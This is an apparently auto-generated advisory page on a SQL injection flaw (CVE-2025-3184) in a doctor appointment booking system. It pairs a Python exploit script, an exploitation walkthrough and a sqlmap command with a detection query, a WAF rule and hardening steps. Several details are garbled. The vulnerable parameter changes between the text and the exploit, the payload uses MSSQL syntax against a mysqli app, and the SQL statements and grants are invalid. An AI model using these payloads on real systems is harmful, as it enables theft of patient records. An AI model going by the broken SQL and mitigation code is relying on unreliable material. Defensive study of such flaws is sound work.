ProjectWorlds Online Doctor Appointment System, SQL Injection, CVE-2025-3184 (Critical)

By /

How CVE-2025-3184 Works

The vulnerability exists in the patient profile module of ProjectWorlds Online Doctor Appointment Booking System 1.0. The `/patient/profile.php` endpoint fails to properly sanitize user-supplied input in the `patientFirstName` parameter when processing requests with patientId. This allows attackers to inject malicious SQL queries through crafted GET requests. The application concatenates unsanitized input directly into SQL statements, enabling unauthorized database access. Attackers can exploit this to extract sensitive patient records, modify database content, or execute administrative operations. The flaw is remotely exploitable without authentication.

DailyCVE Form

Platform: ProjectWorlds Online Doctor
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-04-15

What Undercode Say:

Exploitation:

import requests
target = "http://target.com/patient/profile.php"
payload = "1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--"
response = requests.get(f"{target}?patientId={payload}")
print(response.text)

Detection:

SELECT FROM logs WHERE request_uri LIKE '%patient/profile.php%' AND query_string LIKE '%patientId=%27%';

Mitigation:

// Secure patched code
$patientId = mysqli_real_escape_string($conn, $_GET['patientId']);
$stmt = $conn->prepare("SELECT FROM patients WHERE id = ?");
$stmt->bind_param("i", $patientId);
$stmt->execute();

WAF Rule:

SecRule ARGS_GET:patientId "@detectSQLi" "id:10001,deny,status:403,msg:'SQLi Attempt'"

Database Hardening:

REVOKE ALL PRIVILEGES ON projectworlds. FROM 'webuser'@'%';
GRANT SELECT ONLY ON projectworlds.patients TO 'webuser'@'%';

Exploit Analysis:

  1. Send probe request with basic SQLi test: `patientId=1′–`

2. Identify parameter reflection in error messages

3. Craft UNION-based payload to extract schema

4. Exfiltrate data through time-based techniques if blind

Patch Verification:

curl -s "http://patched/system/version" | grep "1.0.1"
sqlmap -u "http://test.com/patient/profile.php?patientId=1" --level=5 --risk=3

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top